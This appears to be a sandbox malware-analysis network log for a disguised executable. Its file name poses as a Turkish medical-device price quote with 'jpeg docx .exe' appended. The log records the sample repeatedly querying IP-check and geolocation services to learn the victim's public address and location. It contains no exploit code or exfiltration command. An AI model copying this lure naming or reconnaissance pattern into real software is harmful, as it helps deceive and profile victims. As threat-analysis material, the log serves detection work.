                                                                                                  6192.168.2.649783193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:32.149127960 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 10, 2024 16:24:33.244954109 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:33 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 82409dd31f5e6ca2237408433a982683
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.649790193.122.130.0801088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 10, 2024 16:24:35.036919117 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 10, 2024 16:24:36.133208990 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:35 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 1539fd5d029587660c5af66f4c4816c6
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649718172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:14 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:15 UTC893INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:14 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23577
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZX7TW3MpSQg%2B2ekT%2BGzNcppVXHI%2Fi8SW4TgGhYniw6y1%2Bu%2B648W%2B1Imj2AJAWPf%2FKfog3ICax9J4H16ZAGzo%2Bc%2BpxZTuoxLqhsYxs45JCLBtYNwE3k%2BYyq8V%2BG0pCU3%2BLI8RtJ89"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3da19add8cad-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1961&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1465863&cwnd=246&unsent_bytes=0&cid=bf7da386946207e5&ts=457&x=0"
                                                                                                  2024-12-10 15:24:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.649726172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:16 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2024-12-10 15:24:17 UTC879INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:16 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23579
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zK%2BH4MRcp9mA8Oh6qoSu2k2SuA6qTWE9%2Brj827jNssU%2F5fsajX73Ad%2BeKDWMkwtTzp2gz963J5OIjPgLAAtGFLtmgIHjpjW3RTf%2BM8GDXuPxKAkGeHBD3ZrC7FnS4XRJCCYxzGlS"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3dae2b9642f1-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1581&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1788120&cwnd=210&unsent_bytes=0&cid=de66bc56b9108f1f&ts=454&x=0"
                                                                                                  2024-12-10 15:24:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.649737172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:19 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:20 UTC875INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:19 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23582
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1URKBYV%2F%2BAQDdooal5A6UkJLrU7PBGCpotgrcCwfbj%2FMMB3JbWbVDqVrHhNSg7r0ywoA3tThixqnqD5cAmlSh22YCOiWYtmY5Gt1BwEpDbvYHxcluhtye5sDtFfTCx0xztcNy7ff"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3dc04b888c87-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2027&rtt_var=775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1397797&cwnd=214&unsent_bytes=0&cid=88c08b3fc897542f&ts=454&x=0"
                                                                                                  2024-12-10 15:24:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.649750172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:22 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:23 UTC875INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:22 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23585
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEQoSedT7BfPpLIhf%2FV1YrN8vvjntAuzZtvpYPOim9tO5WBctBmUt%2B72ryUkcc4Rr4eqPhvYObxhkM%2BLM39pwYz6rs7WjnnnJBFjseelNG6szChiiNFkHAS6uYTGAj6wuLiAu9uZ"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3dd359171889-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1724&rtt_var=652&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1693735&cwnd=252&unsent_bytes=0&cid=7dea35296d109ca5&ts=455&x=0"
                                                                                                  2024-12-10 15:24:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.649757172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:25 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:26 UTC877INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:25 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23588
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RExn3X3NTHagC%2FCx2mIOIGXcUougXbJcF%2FITk3hq2OJhnRPek8Pdf%2BxynVfycT05w4GfjsppwIoPQV1xz3oDpo5q2f%2BuhzG5LYVpgN2Yb8WxitsZo6AGPeqnNubBZ2uIaspc3GD"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3de599fbde92-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1795817&cwnd=241&unsent_bytes=0&cid=59494dc5ea8e35ac&ts=451&x=0"
                                                                                                  2024-12-10 15:24:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.649770172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:28 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:29 UTC879INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:28 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23591
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABDripMmgM3Aa5E7RswWed7Z95pj%2Bj4EJ84yXtM6n6%2BZ%2FOidsMXJgRgn17bhpg2%2BUO4nYz8HAPEDROpR36gsWFQc4II%2BDwvfXZpnuOKY16QoSapCNm5RTcxgZU3RhFuMV45oZugE"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3df8eb914374-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1587&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1778319&cwnd=218&unsent_bytes=0&cid=f5094e10fa20e78e&ts=563&x=0"
                                                                                                  2024-12-10 15:24:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.649777172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:31 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2024-12-10 15:24:32 UTC881INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:31 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23594
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SO1OyxwoZILn%2Bgfhi%2F66pk8rCf6IFjMLDiO7Rcch04bwXQtY0BVB1QARRf4TmryqDk5lAvxMROiOewicI%2FaX8jH%2B1Bd2nsGLdJOcGcSQRfXaYG%2Br1UGF7uKO03BUXdGRmFR%2BcBJF"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3e0afaea425b-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1783&rtt_var=676&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1611479&cwnd=236&unsent_bytes=0&cid=c72d66e0823ce0d1&ts=471&x=0"
                                                                                                  2024-12-10 15:24:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.649784172.67.177.1344431088C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-10 15:24:34 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-10 15:24:34 UTC875INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 10 Dec 2024 15:24:34 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 23597
                                                                                                  Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5Nq8ewechGe1DHI%2FJ4qDB0zo9lnLS4hBifqYFUFeir0y1DufLhEHUdnfD%2Fj8YUy0T44y9vQXzqZdna%2BdeJmgVzjDKoI2hxLP3tZftrUrF7UEMWcS90y3jPDf3gsLwVzFAWJ0q70"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8efe3e1d1b9a429a-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1781&rtt_var=682&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1586956&cwnd=237&unsent_bytes=0&cid=9c9111df91b16d14&ts=456&x=0"
